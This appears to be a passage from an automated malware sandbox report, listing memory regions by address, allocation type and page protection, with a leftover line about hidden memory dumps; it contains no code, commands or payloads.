trusted library allocation
|
page read and write
|
||
|
518000
|
heap
|
page read and write
|
||
|
6F30000
|
direct allocation
|
page read and write
|
||
|
9F8000
|
stack
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
942B000
|
heap
|
page read and write
|
||
|
2EAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
24E70000
|
trusted library allocation
|
page read and write
|
||
|
260F7000
|
trusted library allocation
|
page read and write
|
||
|
24AED000
|
stack
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
9130000
|
direct allocation
|
page execute and read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
5618000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
77CE000
|
stack
|
page read and write
|
||
|
3163000
|
unkown
|
page read and write
|
||
|
24B80000
|
remote allocation
|
page read and write
|
||
|
95A7000
|
heap
|
page read and write
|
||
|
251AA000
|
trusted library allocation
|
page read and write
|
||
|
439000
|
unkown
|
page read and write
|
||
|
9100000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F40000
|
direct allocation
|
page read and write
|
||
|
45A9000
|
remote allocation
|
page execute and read and write
|
||
|
7590000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2722E000
|
stack
|
page read and write
|
||
|
2761F000
|
stack
|
page read and write
|
||
|
4835000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C6B000
|
stack
|
page read and write
|
||
|
5EA9000
|
trusted library allocation
|
page read and write
|
||
|
6EBE000
|
stack
|
page read and write
|
||
|
82E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
24CA7000
|
stack
|
page read and write
|
||
|
2B76000
|
heap
|
page read and write
|
||
|
2B2E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9418000
|
heap
|
page read and write
|
||
|
946B000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
2D3C000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
9390000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
CE79000
|
direct allocation
|
page execute and read and write
|
||
|
24B80000
|
remote allocation
|
page read and write
|
||
|
8A90000
|
heap
|
page read and write
|
||
|
871C000
|
heap
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page read and write
|
||
|
317E000
|
unkown
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page read and write
|
||
|
85EE000
|
stack
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
27D9C000
|
stack
|
page read and write
|
||
|
2FFE000
|
unkown
|
page read and write
|
||
|
2765E000
|
stack
|
page read and write
|
||
|
6F20000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8795000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
A5F000
|
stack
|
page read and write
|
||
|
24FAF000
|
stack
|
page read and write
|
||
|
8797000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
83D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page readonly
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
59A9000
|
remote allocation
|
page execute and read and write
|
||
|
946D000
|
heap
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
direct allocation
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
252B0000
|
trusted library allocation
|
page read and write
|
||
|
883F000
|
heap
|
page read and write
|
||
|
345E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24A4E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
24A8F000
|
stack
|
page read and write
|
||
|
576000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2490000
|
heap
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24E84000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
75A0000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
780D000
|
stack
|
page read and write
|
||
|
7567000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
4803000
|
trusted library allocation
|
page execute and read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
547000
|
heap
|
page read and write
|
||
|
24470000
|
direct allocation
|
page read and write
|
||
|
8BA9000
|
remote allocation
|
page execute and read and write
|
||
|
24480000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24E1C000
|
stack
|
page read and write
|
||
|
3175000
|
unkown
|
page read and write
|
||
|
87A2000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
317B000
|
unkown
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
24CEE000
|
stack
|
page read and write
|
||
|
863B000
|
trusted library allocation
|
page read and write
|
||
|
4CC9000
|
heap
|
page read and write
|
||
|
199000
|
stack
|
page read and write
|
||
|
93A0000
|
direct allocation
|
page read and write
|
||
|
24F00000
|
trusted library allocation
|
page read and write
|
||
|
2EC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
3151000
|
unkown
|
page read and write
|
||
|
2FA5000
|
heap
|
page read and write
|
||
|
9BC000
|
stack
|
page read and write
|
||
|
24E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB1000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
stack
|
page read and write
|
||
|
9570000
|
direct allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
3160000
|
unkown
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
32FD000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9590000
|
direct allocation
|
page read and write
|
||
|
24F10000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24A00000
|
trusted library allocation
|
page read and write
|
||
|
9580000
|
direct allocation
|
page read and write
|
||
|
251C2000
|
trusted library allocation
|
page read and write
|
||
|
24EC6000
|
trusted library allocation
|
page read and write
|
||
|
2EC2000
|
trusted library allocation
|
page read and write
|
||
|
3154000
|
unkown
|
page read and write
|
||
|
252A2000
|
trusted library allocation
|
page read and write
|
||
|
24EF0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
8714000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
2EDB000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E81000
|
trusted library allocation
|
page read and write
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
27290000
|
heap
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
heap
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
24EA9000
|
trusted library allocation
|
page read and write
|
||
|
25294000
|
trusted library allocation
|
page read and write
|
||
|
24EF6000
|
trusted library allocation
|
page read and write
|
||
|
2494E000
|
stack
|
page read and write
|
||
|
24EE0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
9474000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
82F0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
340E000
|
unkown
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
27310000
|
heap
|
page read and write
|
||
|
24BFF000
|
stack
|
page read and write
|
||
|
8637000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
244D0000
|
direct allocation
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
2ED7000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
270F0000
|
heap
|
page read and write
|
||
|
239F000
|
stack
|
page read and write
|
||
|
27E1E000
|
stack
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
3166000
|
unkown
|
page read and write
|
||
|
8450000
|
trusted library allocation
|
page read and write
|
||
|
25229000
|
trusted library allocation
|
page read and write
|
||
|
4C30000
|
heap
|
page readonly
|
||
|
7635000
|
heap
|
page read and write
|
||
|
4820000
|
trusted library allocation
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
2470000
|
heap
|
page read and write
|
||
|
251ED000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
82C4000
|
stack
|
page read and write
|
||
|
25274000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
86EC000
|
heap
|
page read and write
|
||
|
25266000
|
trusted library allocation
|
page read and write
|
There are 588 hidden memdumps, click here to show them.